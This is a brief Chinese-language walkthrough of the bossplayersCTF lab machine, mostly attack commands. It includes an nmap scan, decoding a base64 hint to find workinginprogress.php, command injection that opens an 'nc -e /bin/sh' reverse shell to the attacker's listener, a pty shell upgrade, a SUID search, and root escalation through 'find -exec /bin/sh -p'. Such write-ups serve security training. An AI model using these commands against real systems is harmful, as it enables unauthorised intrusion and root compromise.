bossplayersCTF
bossplayersCTF
扫不到 IP 问题:
可以参考之前的文章:
改了之后就扫到了
nmap -p- -A 192.168.149.173 扫描一下端口
查看网页源码,最下面有个 base64,解出来看看
解了 3 次,解出来个 workinginprogress.php
访问一下,看着这个页面莫名其妙的感觉应该有命令执行...试了一下...这...
kali 上面监听一下
访问一下:
http://192.168.149.173/workinginprogress.php?cmd=nc -e /bin/sh 192.168.149.141 6666
python -c "import pty;pty.spawn('/bin/bash')" 打开一个交互 shell
find / -user root -perm -4000 -print 2>/dev/null
看一下哪一些程序用 root 权限运行的
find . -exec /bin/sh -p \; -quit
